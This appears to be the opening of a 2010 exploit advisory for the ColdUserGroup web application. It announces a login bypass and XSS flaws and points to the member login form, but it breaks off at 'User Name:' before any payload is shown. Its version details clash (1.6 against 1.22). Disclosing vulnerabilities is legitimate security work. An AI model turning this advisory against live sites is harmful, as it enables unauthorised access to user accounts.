#********************************************************** # Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities # Date: 09/09/2010 # Author: Sangteamtham # Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8 # Version: 1.22 # Tested on: Windows 7 # #*********************************************************** 1.Description: Built using Fusebox and adhering to CSS/XHTML standards the ColdUserGroup application is intended to allow a quickstart to hosting your own user group web site. Currently in live use at www.actcfug.com. Some of the features in use on the live site have been removed but can be easily integrated (ie: Google Calendar). This new version now utilises FCKEditor as the rich text editor, rather than the original ActivEdit 2. Exploit 2.a: bypass login http://site.com/index.cfm?actcfug=MemberLoginForm User Name: